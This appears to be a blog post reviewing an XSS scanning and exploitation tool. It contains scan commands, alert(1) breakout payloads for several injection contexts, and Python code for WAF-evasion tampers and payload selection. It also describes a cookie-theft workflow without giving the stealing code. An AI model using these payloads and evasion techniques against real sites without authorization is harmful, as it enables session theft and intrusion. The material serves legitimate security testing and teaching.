XssFleet: Automated XSS Vulnerability Detection and Exploitation Tool
GitHub: https://github.com/jhli07/XssFleet
If you have ever run a web security scan and found yourself drowning in false positives from basic XSS detectors, you know the pain. Most tools either spray-and-pray with generic payloads or trip WAFs instantly. XssFleet is a different breed — a Python-based penetration testing tool that does not just detect XSS vulnerabilities, it helps you verify and exploit them in a controlled way.
I stumbled across this project on GitHub and was genuinely impressed by its scope. Let me break it down for you.
What is XssFleet?
XssFleet is a professional-grade, automated XSS (Cross-Site Scripting) vulnerability penetration testing tool written in Python. It is designed for security researchers and penetration testers who need more than a basic scanner.
Quick Stats:
- Language: Python
- License: MIT
- Created: May 2, 2026
- Repository: https://github.com/jhli07/XssFleet
Supported XSS Types
This is where XssFleet stands out. It does not just handle one or two XSS types — it covers a wide range:
- Reflected XSS — User input is echoed back in the immediate server response
- Stored XSS — Malicious script is persisted on the target server and served to later visitors
- DOM-based XSS — The flaw lives entirely in client-side JavaScript (a source such as location.hash reaching a sink such as innerHTML), so the server response never contains the payload
- Blind XSS — Payload executes somewhere the tester cannot observe directly (e.g., an admin panel reviewing submitted data)
- SVG XSS — Script or event handlers embedded in SVG documents, typically via an uploaded SVG rendered inline
- JSONP XSS — A JSONP callback parameter reflected unfiltered into a script response
- AngularJS XSS — Client-side template injection in AngularJS expressions
Installation
# Clone the repository
git clone https://github.com/jhli07/XssFleet.git
cd XssFleet
# Install dependencies
pip install -r requirements.txt
# Run
python xssfleet/xssfleet.py --help
Core Features
1. Intelligent Payload Generation
XssFleet generates context-aware payloads instead of using a one-size-fits-all wordlist. It automatically detects the vulnerability context (HTML tags, attributes, JavaScript, DOM) and crafts appropriate payloads.
2. WAF Bypass with Tamper Scripts
Got a WAF blocking your scans? XssFleet has built-in tamper scripts:
python xssfleet/xssfleet.py -u "http://waf-protected.com/search" --tamper=space2comment,base64encode
Available tamper scripts include:
- space2comment — Replaces spaces with /* */ comments
- base64encode — Base64 encodes the payload
- And more...
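To make the tamper mechanism concrete, here is an added example (my own code, not XssFleet's implementation) of the two transforms listed above plus a chain runner that accepts the same comma-separated spec as `--tamper=space2comment,base64encode`. The `atob_wrapper` helper is an assumption about how a base64 tamper is typically made useful, since base64 text on its own is inert until something decodes it:

```python
import base64


def space2comment(payload: str) -> str:
    """Replace every space with an empty comment.

    The HTML tokenizer treats '/' as a terminator for a tag or attribute name
    just as it treats whitespace, so <img/**/src=x/**/onerror=alert(1)> still
    parses as an <img> carrying both attributes, while signature rules that
    expect whitespace before an event handler no longer match.
    """
    return payload.replace(" ", "/**/")


def base64encode(payload: str) -> str:
    """Base64 the payload. On its own the result is inert text: it only helps
    when the page, or a wrapper such as eval(atob(...)), decodes it again."""
    return base64.b64encode(payload.encode("utf-8")).decode("ascii")


def atob_wrapper(encoded: str) -> str:
    """Wrap a base64 JS snippet so the literal 'alert(' never appears in the
    request (assumed wrapper, not a documented XssFleet tamper)."""
    return f"<img src=x onerror=eval(atob('{encoded}'))>"


# Registry keyed by the names used on the command line.
TAMPERS = {
    "space2comment": space2comment,
    "base64encode": base64encode,
}


def apply_tampers(payload: str, spec: str) -> str:
    """Apply a comma-separated tamper chain left to right, mirroring --tamper=a,b.
    Unknown names fail loudly rather than silently sending an untampered payload."""
    for name in (n.strip() for n in spec.split(",") if n.strip()):
        try:
            payload = TAMPERS[name](payload)
        except KeyError:
            raise ValueError(f"unknown tamper script: {name}") from None
    return payload


if __name__ == "__main__":
    probe = "<img src=x onerror=alert(1)>"
    print(apply_tampers(probe, "space2comment"))
    # Base64 the JS, wrap it so the browser decodes it, then strip spaces:
    print(space2comment(atob_wrapper(base64encode("alert(1)"))))
```

Order matters in a chain: `space2comment,base64encode` comments the spaces and then encodes the whole string, whereas the reverse would encode first and leave nothing for `space2comment` to touch.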
3. Browser-Based Verification
False positives are the bane of automated scanners. XssFleet solves this with --verify mode, which uses browser automation to confirm whether a vulnerability is actually exploitable:
python xssfleet/xssfleet.py -u "http://target.com/search?q=test" --verify
4. Deep Scanning Mode
For comprehensive assessments, use --deep mode:
python xssfleet/xssfleet.py -u "http://target.com" --deep --verify -o results/
5. Exploitation Framework
This is where XssFleet goes beyond typical scanners. It has an exploitation mode (--exploit) that lets you:
- Steal Cookies — Capture session cookies from victims (only cookies without the HttpOnly flag are readable from script, so a well-configured session cookie will not show up)
- Keylogging — Log keystrokes on compromised pages
- Page Injection — Inject malicious content into vulnerable pages
- Phishing Simulation — Demonstrate real-world impact
6. Blind XSS Support with ngrok
Testing for blind XSS (where your payload executes in an admin panel or backend you never see) is tricky because the payload needs a callback endpoint reachable from the victim's browser. XssFleet integrates with ngrok to expose the local listener publicly:
# Set up ngrok (requires ngrok installation and authtoken)
ngrok http 8080
# In another terminal, run XssFleet in exploitation mode
python xssfleet/xssfleet.py --exploit
7. POST Request Testing
Not all XSS vulnerabilities live in GET parameters:
python xssfleet/xssfleet.py -u "http://example.com/login" --method POST --data "username=test&password=123"
8. Hidden Parameter Discovery
Explicitly target a parameter, including one that does not appear in the URL but that the application still reads:
python xssfleet/xssfleet.py -u "http://example.com/page" -p t_sort
9. Report Generation
Generate detailed reports in multiple formats:
python xssfleet/xssfleet.py -u "http://target.com" --report-format all -o report/
Real-World Usage Examples
Example 1: Basic Scan
python xssfleet/xssfleet.py -u "http://vulnerable.com/search?q=test"
Example 2: Deep Scan with Verification
python xssfleet/xssfleet.py -u "http://target.com" --deep --verify
Example 3: Bypassing WAF
python xssfleet/xssfleet.py -u "http://waf-protected.com/search" --tamper=space2comment,base64encode
Example 4: Cookie Theft Attack
# Phase 1: Discover vulnerability
python xssfleet/xssfleet.py -u "http://vulnerable.com/search?q=test"
# Phase 2: Launch exploitation
python xssfleet/xssfleet.py --exploit
# Phase 3: Select "steal_cookie" module
# Phase 4: Inject generated payload into the vulnerability point
# Phase 5: Wait for target to visit, then view captured cookies
Example 5: Complete Penetration Testing Workflow
# Phase 1: Discover
python xssfleet/xssfleet.py -u "http://target.com" --deep --verify -o phase1/
# Phase 2: Exploit
python xssfleet/xssfleet.py --exploit
# Phase 3: Report
python xssfleet/xssfleet.py -u "http://target.com" --report-format all -o final_report/
Understanding XSS Contexts
XssFleet automatically handles different vulnerability contexts:
HTML Tag Context
Input appears directly between HTML tags like: <div>USER INPUT</div>
Payload: <script>alert(1)</script>
HTML Attribute Context
Input becomes an attribute value like: <input value="USER INPUT">
Payload: "><script>alert(1)</script>
JavaScript Context
Input lands inside a script block like: <script>var name = "USER INPUT";</script>
Payload: ";alert(1);"
DOM-based Context
Input processed by JavaScript DOM manipulation like: document.write(location.hash)
Payload: #<img src=x onerror=alert(1)>
This sink only fires if the script receives the raw fragment: browsers that follow the WHATWG URL spec (Chrome, for one) percent-encode < and > in location.hash, so in practice the page has to decode it first (e.g., decodeURIComponent(location.hash)). Because the payload never reaches the server, a response-based scan cannot find it, which is why DOM-based XSS needs the browser-based --verify mode.
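The context detection described in this section is simple to implement for the server-reflected cases. Below is an added example, not XssFleet's code, of a classifier that locates a unique probe marker in an HTML response, decides which of the contexts above it landed in, and picks the matching payload. The marker value `xsf7q2`, the context names and the non-page payloads (single-quote, unquoted-attribute, comment and bare-JS variants) are my own choices; it goes a step beyond the text by distinguishing quote styles, and by design it cannot see DOM-based sinks, which only a browser can observe:

```python
import re

# Constructed probe marker (assumption): a unique token injected into the
# parameter under test and then searched for in the response body.
MARKER = "xsf7q2"

# Candidate payload per context. The html_text, attr_dq and js_string_dq
# entries follow the page; the rest are added variants for the other quoting styles.
PAYLOADS = {
    "html_text": "<script>alert(1)</script>",
    "html_comment": "--><script>alert(1)</script>",
    "attr_dq": '"><script>alert(1)</script>',
    "attr_sq": "'><script>alert(1)</script>",
    "attr_unquoted": "x onmouseover=alert(1) y",
    "js_string_dq": '";alert(1);"',
    "js_string_sq": "';alert(1);'",
    "js_code": ";alert(1);//",
}


def _open_quote(segment: str, js: bool = False):
    """Return the quote character still open at the end of `segment`, or None.
    In JS mode a backslash escapes the following character inside a string."""
    quote = None
    i = 0
    while i < len(segment):
        ch = segment[i]
        if js and quote and ch == "\\":
            i += 2
            continue
        if quote is None and ch in "\"'":
            quote = ch
        elif ch == quote:
            quote = None
        i += 1
    return quote


def detect_context(body: str, marker: str = MARKER) -> str:
    """Classify where the first reflection of `marker` lands in an HTML response."""
    idx = body.find(marker)
    if idx == -1:
        return "not_reflected"
    before = body[:idx]

    # Inside a <script> block: the last <script ...> start has no later </script>.
    opens = [m.end() for m in re.finditer(r"<script\b[^>]*>", before, re.I)]
    closes = [m.end() for m in re.finditer(r"</script\s*>", before, re.I)]
    if opens and (not closes or opens[-1] > closes[-1]):
        q = _open_quote(before[opens[-1]:], js=True)
        return {'"': "js_string_dq", "'": "js_string_sq"}.get(q, "js_code")

    # Inside a tag: a '<' after the last '>' means the tag is still open.
    lt, gt = before.rfind("<"), before.rfind(">")
    if lt > gt:
        tag = before[lt:]
        if tag.startswith("<!--"):
            return "html_comment"
        q = _open_quote(tag)
        if q:
            return "attr_dq" if q == '"' else "attr_sq"
        # Marker right after '=' is an unquoted value; elsewhere inside the tag
        # it sits among attribute names, which the payload table does not cover.
        return "attr_unquoted" if tag.rstrip().endswith("=") else "tag_internal"

    return "html_text"


def choose_payload(context: str):
    """Payload for a detected context, or None when no breakout is catalogued."""
    return PAYLOADS.get(context)


def classify_reflection(body: str, marker: str = MARKER):
    """Convenience wrapper returning (context, payload) for one response."""
    ctx = detect_context(body, marker)
    return ctx, choose_payload(ctx)


if __name__ == "__main__":
    # Constructed sample responses, one per context from the section above.
    for sample in (
        f"<div>{MARKER}</div>",
        f'<input value="{MARKER}">',
        f'<script>var name = "{MARKER}";</script>',
        f"<script>var n = 1; f({MARKER});</script>",
    ):
        print(classify_reflection(sample))
```

A real scanner runs this per reflection point rather than once, since a single parameter is often echoed in several places (title, form field, inline script) and each needs its own breakout.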
Ethical Disclaimer
XssFleet is a security research tool. Only use it on systems you have explicit written authorization to test. Unauthorized scanning/testing is illegal and unethical. The maintainers assume no liability for misuse.
How Does It Compare?
| Feature | XssFleet | XSStrike | DalFox |
|---|---|---|---|
| WAF Bypass | Yes | Yes | Yes |
| Exploitation Mode | Yes | No | No |
| Blind XSS | Yes | Limited | Yes |
| Browser Verification | Yes | No | No |
| Cookie Theft | Yes | No | No |
| DOM XSS | Yes | Yes | Yes |
| ngrok Integration | Yes | No | No |
Final Thoughts
XssFleet is a serious tool for serious security work. While tools like XSStrike and DalFox are excellent at detection, XssFleet goes the extra mile with its exploitation framework. The ability to verify vulnerabilities with browser automation, bypass WAFs, and actually demonstrate impact with cookie theft and similar attacks makes it a valuable addition to any penetration tester toolkit.
If you are doing authorized security testing, give it a spin:
👉 https://github.com/jhli07/XssFleet
Have you tried XssFleet? Share your experience in the comments!